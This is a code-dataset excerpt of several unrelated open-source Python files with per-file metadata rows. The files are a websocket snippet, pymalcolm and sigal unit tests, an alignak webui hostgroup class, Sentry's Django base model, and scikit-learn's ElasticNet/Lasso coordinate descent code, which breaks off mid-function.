self.previous_msg_timestamp = self.current_msg_timestamp
def onClose(self, wasClean, code, reason):
log.debug('Disconnecting {0} ...'.format(self.address))
self.sendMessage('off'.encode('ascii'))
| mit | 4,412,727,215,913,162,000 | 36.483871 | 95 | 0.636403 | false |
dls-controls/pymalcolm | tests/test_modules/test_builtin/test_basiccontroller.py | 1 | 1213 | import unittest
from malcolm.core import Alarm, AlarmSeverity, Process
from malcolm.modules.builtin.controllers import BasicController
from malcolm.modules.builtin.infos import HealthInfo
class TestBasicController(unittest.TestCase):
def setUp(self):
self.process = Process("proc")
self.o = BasicController("MyMRI")
self.process.add_controller(self.o)
self.process.start()
self.b = self.process.block_view("MyMRI")
def tearDown(self):
self.process.stop(timeout=2)
def update_health(self, num, alarm=Alarm.ok):
self.o.update_health(num, HealthInfo(alarm))
def test_set_health(self):
self.update_health(1, Alarm(severity=AlarmSeverity.MINOR_ALARM))
self.update_health(2, Alarm(severity=AlarmSeverity.MAJOR_ALARM))
assert self.b.health.alarm.severity == AlarmSeverity.MAJOR_ALARM
self.update_health(1, Alarm(severity=AlarmSeverity.UNDEFINED_ALARM))
self.update_health(2, Alarm(severity=AlarmSeverity.INVALID_ALARM))
assert self.b.health.alarm.severity == AlarmSeverity.UNDEFINED_ALARM
self.update_health(1)
self.update_health(2)
assert self.o.health.value == "OK"
| apache-2.0 | 2,259,333,449,535,143,000 | 35.757576 | 76 | 0.700742 | false |
kontza/sigal | tests/test_encrypt.py | 1 | 2796 | import os
import pickle
from io import BytesIO
from sigal import init_plugins
from sigal.gallery import Gallery
from sigal.plugins.encrypt import endec
from sigal.plugins.encrypt.encrypt import cache_key
CURRENT_DIR = os.path.dirname(__file__)
def get_key_tag(settings):
options = settings["encrypt_options"]
key = endec.kdf_gen_key(
options["password"],
options["kdf_salt"],
options["kdf_iters"]
)
tag = options["gcm_tag"].encode("utf-8")
return (key, tag)
def test_encrypt(settings, tmpdir, disconnect_signals):
settings['destination'] = str(tmpdir)
if "sigal.plugins.encrypt" not in settings["plugins"]:
settings['plugins'] += ["sigal.plugins.encrypt"]
settings['encrypt_options'] = {
'password': 'password',
'ask_password': True,
'gcm_tag': 'AuTheNTiCatIoNtAG',
'kdf_salt': 'saltysaltsweetysweet',
'kdf_iters': 10000,
'encrypt_symlinked_originals': False
}
init_plugins(settings)
gal = Gallery(settings)
gal.build()
# check the encrypt cache exists
cachePath = os.path.join(settings["destination"], ".encryptCache")
assert os.path.isfile(cachePath)
encryptCache = None
with open(cachePath, "rb") as cacheFile:
encryptCache = pickle.load(cacheFile)
assert isinstance(encryptCache, dict)
testAlbum = gal.albums["encryptTest"]
key, tag = get_key_tag(settings)
for media in testAlbum:
# check if sizes are stored in cache
assert cache_key(media) in encryptCache
assert "size" in encryptCache[cache_key(media)]
assert "thumb_size" in encryptCache[cache_key(media)]
assert "encrypted" in encryptCache[cache_key(media)]
encryptedImages = [
media.dst_path,
media.thumb_path
]
if settings["keep_orig"]:
encryptedImages.append(os.path.join(settings["destination"],
media.path, media.big))
# check if images are encrypted by trying to decrypt
for image in encryptedImages:
with open(image, "rb") as infile:
with BytesIO() as outfile:
endec.decrypt(key, infile, outfile, tag)
# check static files have been copied
static = os.path.join(settings["destination"], 'static')
assert os.path.isfile(os.path.join(static, "decrypt.js"))
assert os.path.isfile(os.path.join(static, "keycheck.txt"))
assert os.path.isfile(os.path.join(settings["destination"], "sw.js"))
# check keycheck file
with open(os.path.join(settings["destination"],
'static', "keycheck.txt"), "rb") as infile:
with BytesIO() as outfile:
endec.decrypt(key, infile, outfile, tag)
| mit | 7,785,521,272,187,205,000 | 32.285714 | 73 | 0.629471 | false |
mohierf/bottle-webui | alignak_webui/objects/item_hostgroup.py | 1 | 3392 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# Many functions need to use protected members of a base class
# pylint: disable=protected-access
# Attributes need to be defined in constructor before initialization
# pylint: disable=attribute-defined-outside-init
# Copyright (c) 2015-2017:
# Frederic Mohier, [email protected]
#
# This file is part of (WebUI).
#
# (WebUI) is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# (WebUI) is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with (WebUI). If not, see <http://www.gnu.org/licenses/>.
"""
This module contains the classes used to manage the application objects with the data manager.
"""
from alignak_webui.objects.element import BackendElement
class HostGroup(BackendElement):
"""
Object representing a hostgroup
"""
_count = 0
# Next value used for auto generated id
_next_id = 1
# _type stands for Backend Object Type
_type = 'hostgroup'
# _cache is a list of created objects
_cache = {}
# Converting real state identifier to text status
overall_state_to_status = [
'ok', 'acknowledged', 'in_downtime', 'warning', 'critical'
]
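    # Illustrative mapping: an ``_overall_state`` of 0 renders as 'ok',
    # 2 as 'in_downtime' and 4 as 'critical'.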
def __init__(self, params=None, date_format='%a, %d %b %Y %H:%M:%S %Z', embedded=True):
"""
Create a hostgroup (called only once when an object is newly created)
"""
self._linked_hostgroups = 'hostgroup'
self._linked__parent = 'hostgroup'
self._linked_hosts = 'host'
super(HostGroup, self).__init__(params, date_format, embedded)
if not hasattr(self, '_overall_state'):
setattr(self, '_overall_state', 0)
@property
def members(self):
""" Return linked object """
return self._linked_hosts
@property
def hosts(self):
""" Return linked object """
return self._linked_hosts
@property
def hostgroups(self):
""" Return linked object """
return self._linked_hostgroups
@property
def _parent(self):
""" Return group parent """
return self._linked__parent
@property
def level(self):
""" Return group level """
if not hasattr(self, '_level'):
return -1
return self._level
# @property
# def status(self):
# """Return real status string from the real state identifier"""
# return self.overall_state
#
# @property
# def overall_state(self):
# """Return real state identifier"""
# return self._overall_state
#
# @overall_state.setter
# def overall_state(self, overall_state):
# """
# Set Item object overall_state
# """
# self._overall_state = overall_state
#
# @property
# def overall_status(self):
# """Return real status string from the real state identifier"""
# return self.overall_state_to_status[self._overall_state]
| agpl-3.0 | -7,640,984,566,309,661,000 | 30.119266 | 98 | 0.637972 | false |
mitsuhiko/sentry | src/sentry/db/models/base.py | 1 | 3272 | """
sentry.db.models
~~~~~~~~~~~~~~~~
:copyright: (c) 2010-2014 by the Sentry Team, see AUTHORS for more details.
:license: BSD, see LICENSE for more details.
"""
from __future__ import absolute_import
import logging
from django.db import models
from django.db.models import signals
from .fields.bounded import BoundedBigAutoField
from .manager import BaseManager
from .query import update
__all__ = ('BaseModel', 'Model', 'sane_repr')
UNSAVED = object()
def sane_repr(*attrs):
if 'id' not in attrs and 'pk' not in attrs:
attrs = ('id',) + attrs
def _repr(self):
cls = type(self).__name__
pairs = (
'%s=%s' % (a, repr(getattr(self, a, None)))
for a in attrs)
return u'<%s at 0x%x: %s>' % (cls, id(self), ', '.join(pairs))
return _repr
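# Illustrative use (names are hypothetical): a model declaring
#     __repr__ = sane_repr('slug')
# renders roughly as "<Project at 0x7f...: id=1, slug='backend'>".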
class BaseModel(models.Model):
class Meta:
abstract = True
objects = BaseManager()
update = update
def __init__(self, *args, **kwargs):
super(BaseModel, self).__init__(*args, **kwargs)
self._update_tracked_data()
def __getstate__(self):
d = self.__dict__.copy()
# we cant serialize weakrefs
d.pop('_Model__data', None)
return d
def __reduce__(self):
(model_unpickle, stuff, _) = super(BaseModel, self).__reduce__()
return (model_unpickle, stuff, self.__getstate__())
def __setstate__(self, state):
self.__dict__.update(state)
self._update_tracked_data()
def __get_field_value(self, field):
if isinstance(field, models.ForeignKey):
return getattr(self, field.column, None)
return getattr(self, field.name, None)
def _update_tracked_data(self):
"Updates a local copy of attributes values"
if self.id:
data = {}
for f in self._meta.fields:
try:
data[f.column] = self.__get_field_value(f)
except AttributeError as e:
# this case can come up from pickling
logging.exception(unicode(e))
self.__data = data
else:
self.__data = UNSAVED
def has_changed(self, field_name):
"Returns ``True`` if ``field`` has changed since initialization."
if self.__data is UNSAVED:
return False
field = self._meta.get_field(field_name)
return self.__data.get(field_name) != self.__get_field_value(field)
def old_value(self, field_name):
"Returns the previous value of ``field``"
if self.__data is UNSAVED:
return None
return self.__data.get(field_name)
class Model(BaseModel):
id = BoundedBigAutoField(primary_key=True)
class Meta:
abstract = True
__repr__ = sane_repr('id')
def __model_post_save(instance, **kwargs):
if not isinstance(instance, BaseModel):
return
instance._update_tracked_data()
def __model_class_prepared(sender, **kwargs):
if not issubclass(sender, BaseModel):
return
if not hasattr(sender, '__core__'):
raise ValueError('{!r} model has not defined __core__'.format(sender))
signals.post_save.connect(__model_post_save)
signals.class_prepared.connect(__model_class_prepared)
| bsd-3-clause | 4,136,426,230,593,140,000 | 25.387097 | 78 | 0.585269 | false |
florian-f/sklearn | sklearn/linear_model/coordinate_descent.py | 1 | 47058 | # Author: Alexandre Gramfort <[email protected]>
# Fabian Pedregosa <[email protected]>
# Olivier Grisel <[email protected]>
# Gael Varoquaux <[email protected]>
#
# License: BSD Style.
import sys
import warnings
import itertools
import operator
from abc import ABCMeta, abstractmethod
import numpy as np
from scipy import sparse
from .base import LinearModel
from ..base import RegressorMixin
from .base import sparse_center_data, center_data
from ..utils import array2d, atleast2d_or_csc, deprecated
from ..cross_validation import check_cv
from ..externals.joblib import Parallel, delayed
from ..externals.six.moves import xrange
from ..utils.extmath import safe_sparse_dot
from . import cd_fast
###############################################################################
# ElasticNet model
class ElasticNet(LinearModel, RegressorMixin):
"""Linear Model trained with L1 and L2 prior as regularizer
Minimizes the objective function::
1 / (2 * n_samples) * ||y - Xw||^2_2 +
+ alpha * l1_ratio * ||w||_1
+ 0.5 * alpha * (1 - l1_ratio) * ||w||^2_2
If you are interested in controlling the L1 and L2 penalty
separately, keep in mind that this is equivalent to::
a * L1 + b * L2
where::
alpha = a + b and l1_ratio = a / (a + b)
The parameter l1_ratio corresponds to alpha in the glmnet R package while
alpha corresponds to the lambda parameter in glmnet. Specifically, l1_ratio
= 1 is the lasso penalty. Currently, l1_ratio <= 0.01 is not reliable,
unless you supply your own sequence of alpha.
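    For example (purely as an illustration), to apply an L1 weight of
    ``a = 0.1`` and an L2 weight of ``b = 0.05``, pass ``alpha = 0.15`` and
    ``l1_ratio = 0.1 / 0.15``.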
Parameters
----------
alpha : float
Constant that multiplies the penalty terms. Defaults to 1.0
See the notes for the exact mathematical meaning of this
parameter.
``alpha = 0`` is equivalent to an ordinary least square, solved
by the :class:`LinearRegression` object. For numerical
reasons, using ``alpha = 0`` with the Lasso object is not advised
and you should prefer the LinearRegression object.
l1_ratio : float
The ElasticNet mixing parameter, with ``0 <= l1_ratio <= 1``. For
        ``l1_ratio = 0`` the penalty is an L2 penalty. For ``l1_ratio = 1`` it
is an L1 penalty. For ``0 < l1_ratio < 1``, the penalty is a
combination of L1 and L2.
fit_intercept: bool
Whether the intercept should be estimated or not. If ``False``, the
data is assumed to be already centered.
normalize : boolean, optional, default False
If ``True``, the regressors X will be normalized before regression.
precompute : True | False | 'auto' | array-like
Whether to use a precomputed Gram matrix to speed up
calculations. If set to ``'auto'`` let us decide. The Gram
matrix can also be passed as argument. For sparse input
this option is always ``True`` to preserve sparsity.
max_iter: int, optional
The maximum number of iterations
    copy_X : boolean, optional, default True
If ``True``, X will be copied; else, it may be overwritten.
tol: float, optional
The tolerance for the optimization: if the updates are
smaller than ``tol``, the optimization code checks the
dual gap for optimality and continues until it is smaller
than ``tol``.
warm_start : bool, optional
When set to ``True``, reuse the solution of the previous call to fit as
initialization, otherwise, just erase the previous solution.
positive: bool, optional
When set to ``True``, forces the coefficients to be positive.
Attributes
----------
``coef_`` : array, shape = (n_features,) | (n_targets, n_features)
parameter vector (w in the cost function formula)
``sparse_coef_`` : scipy.sparse matrix, shape = (n_features, 1) | \
(n_targets, n_features)
``sparse_coef_`` is a readonly property derived from ``coef_``
``intercept_`` : float | array, shape = (n_targets,)
independent term in decision function.
``dual_gap_`` : float | array, shape = (n_targets,)
the current fit is guaranteed to be epsilon-suboptimal with
epsilon := ``dual_gap_``
``eps_`` : float | array, shape = (n_targets,)
``eps_`` is used to check if the fit converged to the requested
``tol``
Notes
-----
To avoid unnecessary memory duplication the X argument of the fit method
should be directly passed as a Fortran-contiguous numpy array.
"""
def __init__(self, alpha=1.0, l1_ratio=0.5, fit_intercept=True,
normalize=False, precompute='auto', max_iter=1000,
copy_X=True, tol=1e-4, warm_start=False, positive=False,
rho=None):
self.alpha = alpha
self.l1_ratio = l1_ratio
if rho is not None:
self.l1_ratio = rho
warnings.warn("rho was renamed to l1_ratio and will be removed "
"in 0.15", DeprecationWarning)
self.coef_ = None
self.fit_intercept = fit_intercept
self.normalize = normalize
self.precompute = precompute
self.max_iter = max_iter
self.copy_X = copy_X
self.tol = tol
self.warm_start = warm_start
self.positive = positive
self.intercept_ = 0.0
def fit(self, X, y, Xy=None, coef_init=None):
"""Fit model with coordinate descent
Parameters
-----------
X: ndarray or scipy.sparse matrix, (n_samples, n_features)
Data
y: ndarray, shape = (n_samples,) or (n_samples, n_targets)
Target
Xy : array-like, optional
Xy = np.dot(X.T, y) that can be precomputed. It is useful
only when the Gram matrix is precomputed.
coef_init: ndarray of shape n_features or (n_targets, n_features)
            The initial coefficients to warm-start the optimization
Notes
-----
Coordinate descent is an algorithm that considers each column of
data at a time hence it will automatically convert the X input
as a Fortran-contiguous numpy array if necessary.
To avoid memory re-allocation it is advised to allocate the
initial data in memory directly using that format.
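        As a sketch (not required), preparing the input once with
        ``X = np.asfortranarray(X, dtype=np.float64)`` gives the layout this
        conversion expects, so repeated fits do not copy the array again.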
"""
if self.alpha == 0:
warnings.warn("With alpha=0, this algorithm does not converge "
"well. You are advised to use the LinearRegression "
"estimator", stacklevel=2)
X = atleast2d_or_csc(X, dtype=np.float64, order='F',
copy=self.copy_X and self.fit_intercept)
# From now on X can be touched inplace
y = np.asarray(y, dtype=np.float64)
# now all computation with X can be done inplace
fit = self._sparse_fit if sparse.isspmatrix(X) else self._dense_fit
fit(X, y, Xy, coef_init)
return self
def _dense_fit(self, X, y, Xy=None, coef_init=None):
# copy was done in fit if necessary
X, y, X_mean, y_mean, X_std = center_data(
X, y, self.fit_intercept, self.normalize, copy=False)
if y.ndim == 1:
y = y[:, np.newaxis]
if Xy is not None and Xy.ndim == 1:
Xy = Xy[:, np.newaxis]
n_samples, n_features = X.shape
n_targets = y.shape[1]
precompute = self.precompute
if hasattr(precompute, '__array__') \
and not np.allclose(X_mean, np.zeros(n_features)) \
and not np.allclose(X_std, np.ones(n_features)):
# recompute Gram
precompute = 'auto'
Xy = None
coef_ = self._init_coef(coef_init, n_features, n_targets)
dual_gap_ = np.empty(n_targets)
eps_ = np.empty(n_targets)
l1_reg = self.alpha * self.l1_ratio * n_samples
l2_reg = self.alpha * (1.0 - self.l1_ratio) * n_samples
# precompute if n_samples > n_features
if precompute == "auto" and n_samples > n_features:
precompute = True
if hasattr(precompute, '__array__'):
Gram = precompute
elif precompute:
Gram = np.dot(X.T, X)
else:
Gram = None
for k in xrange(n_targets):
if Gram is None:
coef_[k, :], dual_gap_[k], eps_[k] = \
cd_fast.enet_coordinate_descent(
coef_[k, :], l1_reg, l2_reg, X, y[:, k], self.max_iter,
self.tol, self.positive)
else:
Gram = Gram.copy()
if Xy is None:
this_Xy = np.dot(X.T, y[:, k])
else:
this_Xy = Xy[:, k]
coef_[k, :], dual_gap_[k], eps_[k] = \
cd_fast.enet_coordinate_descent_gram(
coef_[k, :], l1_reg, l2_reg, Gram, this_Xy, y[:, k],
self.max_iter, self.tol, self.positive)
if dual_gap_[k] > eps_[k]:
warnings.warn('Objective did not converge for ' +
'target %d, you might want' % k +
' to increase the number of iterations')
self.coef_, self.dual_gap_, self.eps_ = (np.squeeze(a) for a in
(coef_, dual_gap_, eps_))
self._set_intercept(X_mean, y_mean, X_std)
# return self for chaining fit and predict calls
return self
def _sparse_fit(self, X, y, Xy=None, coef_init=None):
if X.shape[0] != y.shape[0]:
raise ValueError("X and y have incompatible shapes.\n" +
"Note: Sparse matrices cannot be indexed w/" +
"boolean masks (use `indices=True` in CV).")
# NOTE: we are explicitly not centering the data the naive way to
# avoid breaking the sparsity of X
X_data, y, X_mean, y_mean, X_std = sparse_center_data(
X, y, self.fit_intercept, self.normalize)
if y.ndim == 1:
y = y[:, np.newaxis]
n_samples, n_features = X.shape[0], X.shape[1]
n_targets = y.shape[1]
coef_ = self._init_coef(coef_init, n_features, n_targets)
dual_gap_ = np.empty(n_targets)
eps_ = np.empty(n_targets)
l1_reg = self.alpha * self.l1_ratio * n_samples
l2_reg = self.alpha * (1.0 - self.l1_ratio) * n_samples
for k in xrange(n_targets):
coef_[k, :], dual_gap_[k], eps_[k] = \
cd_fast.sparse_enet_coordinate_descent(
coef_[k, :], l1_reg, l2_reg, X_data, X.indices,
X.indptr, y[:, k], X_mean / X_std,
self.max_iter, self.tol, self.positive)
if dual_gap_[k] > eps_[k]:
warnings.warn('Objective did not converge for ' +
'target %d, you might want' % k +
' to increase the number of iterations')
self.coef_, self.dual_gap_, self.eps_ = (np.squeeze(a) for a in
(coef_, dual_gap_, eps_))
self._set_intercept(X_mean, y_mean, X_std)
# return self for chaining fit and predict calls
return self
def _init_coef(self, coef_init, n_features, n_targets):
if coef_init is None:
if not self.warm_start or self.coef_ is None:
coef_ = np.zeros((n_targets, n_features), dtype=np.float64)
else:
coef_ = self.coef_
else:
coef_ = coef_init
if coef_.ndim == 1:
coef_ = coef_[np.newaxis, :]
if coef_.shape != (n_targets, n_features):
raise ValueError("X and coef_init have incompatible "
"shapes (%s != %s)."
% (coef_.shape, (n_targets, n_features)))
return coef_
@property
def sparse_coef_(self):
""" sparse representation of the fitted coef """
return sparse.csr_matrix(self.coef_)
def decision_function(self, X):
"""Decision function of the linear model
Parameters
----------
X : numpy array or scipy.sparse matrix of shape (n_samples, n_features)
Returns
-------
T : array, shape = (n_samples,)
The predicted decision function
"""
if sparse.isspmatrix(X):
return np.ravel(safe_sparse_dot(self.coef_, X.T, dense_output=True)
+ self.intercept_)
else:
return super(ElasticNet, self).decision_function(X)
###############################################################################
# Lasso model
class Lasso(ElasticNet):
"""Linear Model trained with L1 prior as regularizer (aka the Lasso)
The optimization objective for Lasso is::
(1 / (2 * n_samples)) * ||y - Xw||^2_2 + alpha * ||w||_1
Technically the Lasso model is optimizing the same objective function as
the Elastic Net with ``l1_ratio=1.0`` (no L2 penalty).
Parameters
----------
alpha : float, optional
Constant that multiplies the L1 term. Defaults to 1.0.
``alpha = 0`` is equivalent to an ordinary least square, solved
by the :class:`LinearRegression` object. For numerical
        reasons, using ``alpha = 0`` with the Lasso object is not advised
and you should prefer the LinearRegression object.
fit_intercept : boolean
whether to calculate the intercept for this model. If set
to false, no intercept will be used in calculations
(e.g. data is expected to be already centered).
normalize : boolean, optional, default False
If ``True``, the regressors X will be normalized before regression.
copy_X : boolean, optional, default True
If ``True``, X will be copied; else, it may be overwritten.
precompute : True | False | 'auto' | array-like
Whether to use a precomputed Gram matrix to speed up
calculations. If set to ``'auto'`` let us decide. The Gram
matrix can also be passed as argument. For sparse input
this option is always ``True`` to preserve sparsity.
max_iter: int, optional
The maximum number of iterations
tol : float, optional
The tolerance for the optimization: if the updates are
smaller than ``tol``, the optimization code checks the
dual gap for optimality and continues until it is smaller
than ``tol``.
warm_start : bool, optional
When set to True, reuse the solution of the previous call to fit as
initialization, otherwise, just erase the previous solution.
positive : bool, optional
When set to ``True``, forces the coefficients to be positive.
Attributes
----------
``coef_`` : array, shape = (n_features,) | (n_targets, n_features)
parameter vector (w in the cost function formula)
``sparse_coef_`` : scipy.sparse matrix, shape = (n_features, 1) | \
(n_targets, n_features)
``sparse_coef_`` is a readonly property derived from ``coef_``
``intercept_`` : float | array, shape = (n_targets,)
independent term in decision function.
``dual_gap_`` : float | array, shape = (n_targets,)
the current fit is guaranteed to be epsilon-suboptimal with
epsilon := ``dual_gap_``
``eps_`` : float | array, shape = (n_targets,)
``eps_`` is used to check if the fit converged to the requested
``tol``
Examples
--------
>>> from sklearn import linear_model
>>> clf = linear_model.Lasso(alpha=0.1)
>>> clf.fit([[0,0], [1, 1], [2, 2]], [0, 1, 2])
Lasso(alpha=0.1, copy_X=True, fit_intercept=True, max_iter=1000,
normalize=False, positive=False, precompute='auto', tol=0.0001,
warm_start=False)
>>> print(clf.coef_)
[ 0.85 0. ]
>>> print(clf.intercept_)
0.15
See also
--------
lars_path
lasso_path
LassoLars
LassoCV
LassoLarsCV
sklearn.decomposition.sparse_encode
Notes
-----
The algorithm used to fit the model is coordinate descent.
To avoid unnecessary memory duplication the X argument of the fit method
should be directly passed as a Fortran-contiguous numpy array.
"""
def __init__(self, alpha=1.0, fit_intercept=True, normalize=False,
precompute='auto', copy_X=True, max_iter=1000,
tol=1e-4, warm_start=False, positive=False):
super(Lasso, self).__init__(
alpha=alpha, l1_ratio=1.0, fit_intercept=fit_intercept,
normalize=normalize, precompute=precompute, copy_X=copy_X,
max_iter=max_iter, tol=tol, warm_start=warm_start,
positive=positive)
###############################################################################
# Classes to store linear models along a regularization path
def lasso_path(X, y, eps=1e-3, n_alphas=100, alphas=None,
precompute='auto', Xy=None, fit_intercept=True,
normalize=False, copy_X=True, verbose=False,
**params):
"""Compute Lasso path with coordinate descent
The optimization objective for Lasso is::
(1 / (2 * n_samples)) * ||y - Xw||^2_2 + alpha * ||w||_1
Parameters
----------
X : ndarray, shape = (n_samples, n_features)
Training data. Pass directly as Fortran-contiguous data to avoid
unnecessary memory duplication
y : ndarray, shape = (n_samples,)
Target values
eps : float, optional
Length of the path. ``eps=1e-3`` means that
``alpha_min / alpha_max = 1e-3``
n_alphas : int, optional
Number of alphas along the regularization path
alphas : ndarray, optional
List of alphas where to compute the models.
If ``None`` alphas are set automatically
precompute : True | False | 'auto' | array-like
Whether to use a precomputed Gram matrix to speed up
calculations. If set to ``'auto'`` let us decide. The Gram
matrix can also be passed as argument.
Xy : array-like, optional
Xy = np.dot(X.T, y) that can be precomputed. It is useful
only when the Gram matrix is precomputed.
fit_intercept : bool
Fit or not an intercept
normalize : boolean, optional, default False
If ``True``, the regressors X will be normalized before regression.
copy_X : boolean, optional, default True
If ``True``, X will be copied; else, it may be overwritten.
verbose : bool or integer
Amount of verbosity
params : kwargs
keyword arguments passed to the Lasso objects
Returns
-------
models : a list of models along the regularization path
Notes
-----
See examples/linear_model/plot_lasso_coordinate_descent_path.py
for an example.
To avoid unnecessary memory duplication the X argument of the fit method
should be directly passed as a Fortran-contiguous numpy array.
Note that in certain cases, the Lars solver may be significantly
faster to implement this functionality. In particular, linear
    interpolation can be used to retrieve model coefficients between the
values output by lars_path
Examples
---------
Comparing lasso_path and lars_path with interpolation:
>>> X = np.array([[1, 2, 3.1], [2.3, 5.4, 4.3]]).T
>>> y = np.array([1, 2, 3.1])
>>> # Use lasso_path to compute a coefficient path
>>> coef_path = [e.coef_ for e in lasso_path(X, y, alphas=[5., 1., .5], fit_intercept=False)]
>>> print(np.array(coef_path).T)
[[ 0. 0. 0.46874778]
[ 0.2159048 0.4425765 0.23689075]]
>>> # Now use lars_path and 1D linear interpolation to compute the
>>> # same path
>>> from sklearn.linear_model import lars_path
>>> alphas, active, coef_path_lars = lars_path(X, y, method='lasso')
>>> from scipy import interpolate
>>> coef_path_continuous = interpolate.interp1d(alphas[::-1], coef_path_lars[:, ::-1])
>>> print(coef_path_continuous([5., 1., .5]))
[[ 0. 0. 0.46915237]
[ 0.2159048 0.4425765 0.23668876]]
See also
--------
lars_path
Lasso
LassoLars
LassoCV
LassoLarsCV
sklearn.decomposition.sparse_encode
"""
return enet_path(X, y, l1_ratio=1., eps=eps, n_alphas=n_alphas,
alphas=alphas, precompute=precompute, Xy=Xy,
fit_intercept=fit_intercept, normalize=normalize,
copy_X=copy_X, verbose=verbose, **params)
def enet_path(X, y, l1_ratio=0.5, eps=1e-3, n_alphas=100, alphas=None,
precompute='auto', Xy=None, fit_intercept=True,
normalize=False, copy_X=True, verbose=False, rho=None,
**params):
"""Compute Elastic-Net path with coordinate descent
The Elastic Net optimization function is::
1 / (2 * n_samples) * ||y - Xw||^2_2 +
+ alpha * l1_ratio * ||w||_1
+ 0.5 * alpha * (1 - l1_ratio) * ||w||^2_2
Parameters
----------
X : ndarray, shape = (n_samples, n_features)
Training data. Pass directly as Fortran-contiguous data to avoid
unnecessary memory duplication
y : ndarray, shape = (n_samples,)
Target values
l1_ratio : float, optional
float between 0 and 1 passed to ElasticNet (scaling between
l1 and l2 penalties). ``l1_ratio=1`` corresponds to the Lasso
eps : float
Length of the path. ``eps=1e-3`` means that
``alpha_min / alpha_max = 1e-3``
n_alphas : int, optional
Number of alphas along the regularization path
alphas : ndarray, optional
List of alphas where to compute the models.
If None alphas are set automatically
precompute : True | False | 'auto' | array-like
Whether to use a precomputed Gram matrix to speed up
calculations. If set to ``'auto'`` let us decide. The Gram
matrix can also be passed as argument.
Xy : array-like, optional
Xy = np.dot(X.T, y) that can be precomputed. It is useful
only when the Gram matrix is precomputed.
fit_intercept : bool
Fit or not an intercept
normalize : boolean, optional, default False
If ``True``, the regressors X will be normalized before regression.
copy_X : boolean, optional, default True
If ``True``, X will be copied; else, it may be overwritten.
verbose : bool or integer
Amount of verbosity
params : kwargs
keyword arguments passed to the Lasso objects
Returns
-------
models : a list of models along the regularization path
Notes
-----
See examples/plot_lasso_coordinate_descent_path.py for an example.
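    A minimal call (sketch only) is ``models = enet_path(X, y, l1_ratio=0.5)``;
    each element of the returned list is a fitted :class:`ElasticNet` whose
    ``alpha`` attribute records its position on the path.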
See also
--------
ElasticNet
ElasticNetCV
"""
if rho is not None:
l1_ratio = rho
warnings.warn("rho was renamed to l1_ratio and will be removed "
"in 0.15", DeprecationWarning)
X = atleast2d_or_csc(X, dtype=np.float64, order='F',
copy=copy_X and fit_intercept)
# From now on X can be touched inplace
if not sparse.isspmatrix(X):
X, y, X_mean, y_mean, X_std = center_data(X, y, fit_intercept,
normalize, copy=False)
# XXX : in the sparse case the data will be centered
# at each fit...
n_samples, n_features = X.shape
if (hasattr(precompute, '__array__')
and not np.allclose(X_mean, np.zeros(n_features))
and not np.allclose(X_std, np.ones(n_features))):
# recompute Gram
precompute = 'auto'
Xy = None
if precompute or ((precompute == 'auto') and (n_samples > n_features)):
if sparse.isspmatrix(X):
warnings.warn("precompute is ignored for sparse data")
precompute = False
else:
precompute = np.dot(X.T, X)
if Xy is None:
Xy = safe_sparse_dot(X.T, y, dense_output=True)
n_samples = X.shape[0]
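    # When no grid is given, alphas are log-spaced between alpha_max (the
    # smallest penalty for which the all-zero coefficient vector is optimal)
    # and eps * alpha_max.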
if alphas is None:
alpha_max = np.abs(Xy).max() / (n_samples * l1_ratio)
alphas = np.logspace(np.log10(alpha_max * eps), np.log10(alpha_max),
num=n_alphas)[::-1]
else:
alphas = np.sort(alphas)[::-1] # make sure alphas are properly ordered
coef_ = None # init coef_
models = []
n_alphas = len(alphas)
for i, alpha in enumerate(alphas):
model = ElasticNet(
alpha=alpha, l1_ratio=l1_ratio,
fit_intercept=fit_intercept if sparse.isspmatrix(X) else False,
precompute=precompute)
model.set_params(**params)
model.fit(X, y, coef_init=coef_, Xy=Xy)
if fit_intercept and not sparse.isspmatrix(X):
model.fit_intercept = True
model._set_intercept(X_mean, y_mean, X_std)
if verbose:
if verbose > 2:
print(model)
elif verbose > 1:
print('Path: %03i out of %03i' % (i, n_alphas))
else:
sys.stderr.write('.')
coef_ = model.coef_.copy()
models.append(model)
return models
def _path_residuals(X, y, train, test, path, path_params, l1_ratio=1):
this_mses = list()
if 'l1_ratio' in path_params:
path_params['l1_ratio'] = l1_ratio
models_train = path(X[train], y[train], **path_params)
this_mses = np.empty(len(models_train))
for i_model, model in enumerate(models_train):
y_ = model.predict(X[test])
this_mses[i_model] = ((y_ - y[test]) ** 2).mean()
return this_mses, l1_ratio
class LinearModelCV(LinearModel):
"""Base class for iterative model fitting along a regularization path"""
__metaclass__ = ABCMeta
@abstractmethod
def __init__(self, eps=1e-3, n_alphas=100, alphas=None, fit_intercept=True,
normalize=False, precompute='auto', max_iter=1000, tol=1e-4,
copy_X=True, cv=None, verbose=False):
self.eps = eps
self.n_alphas = n_alphas
self.alphas = alphas
self.fit_intercept = fit_intercept
self.normalize = normalize
self.precompute = precompute
self.max_iter = max_iter
self.tol = tol
self.copy_X = copy_X
self.cv = cv
self.verbose = verbose
def fit(self, X, y):
"""Fit linear model with coordinate descent
Fit is on grid of alphas and best alpha estimated by cross-validation.
Parameters
----------
X : array-like, shape (n_samples, n_features)
Training data. Pass directly as Fortran-contiguous data to avoid
unnecessary memory duplication
y : narray, shape (n_samples,) or (n_samples, n_targets)
Target values
"""
X = atleast2d_or_csc(X, dtype=np.float64, order='F',
copy=self.copy_X and self.fit_intercept)
# From now on X can be touched inplace
y = np.asarray(y, dtype=np.float64)
if X.shape[0] != y.shape[0]:
raise ValueError("X and y have inconsistent dimensions (%d != %d)"
% (X.shape[0], y.shape[0]))
# All LinearModelCV parameters except 'cv' are acceptable
path_params = self.get_params()
if 'l1_ratio' in path_params:
l1_ratios = np.atleast_1d(path_params['l1_ratio'])
# For the first path, we need to set l1_ratio
path_params['l1_ratio'] = l1_ratios[0]
else:
l1_ratios = [1, ]
path_params.pop('cv', None)
path_params.pop('n_jobs', None)
# Start to compute path on full data
# XXX: is this really useful: we are fitting models that we won't
# use later
models = self.path(X, y, **path_params)
# Update the alphas list
alphas = [model.alpha for model in models]
n_alphas = len(alphas)
path_params.update({'alphas': alphas, 'n_alphas': n_alphas})
# init cross-validation generator
cv = check_cv(self.cv, X)
# Compute path for all folds and compute MSE to get the best alpha
folds = list(cv)
best_mse = np.inf
all_mse_paths = list()
